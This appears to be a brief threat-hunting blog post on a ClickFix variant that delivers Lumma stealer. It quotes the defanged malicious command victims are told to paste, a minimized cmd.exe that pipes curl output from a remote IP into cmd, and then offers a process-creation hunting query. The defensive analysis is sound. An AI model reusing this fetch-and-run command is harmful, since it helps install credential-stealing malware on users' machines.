247. Another Hunting Opportunity from ClickFix
Hello everyone!
We already looked at many ClickFix variations, but adversaries keep experimenting with this technique, so we can get more and more detection and hunting opportunities.
This time we'll look at another example used by threat actors to deliver Lumma stealer. The victim is expected to run the following command:
cmd.exe /c start "" /min cmd /k "curl -s hXXp://85.209.129[.]105:2020/19 | cmd && exit; capcha code 74585
Here we can see that the adversary used command line arguments to start download process with the new window minimized. You won't see it very often to be used in legitimate way, so we can use it to create a hunting query:
event_type: "processcreatewin"
AND
proc_file_path: "cmd.exe"
AND
cmdline: ("start" AND "min")
See you tomorrow!
Comments
Post a Comment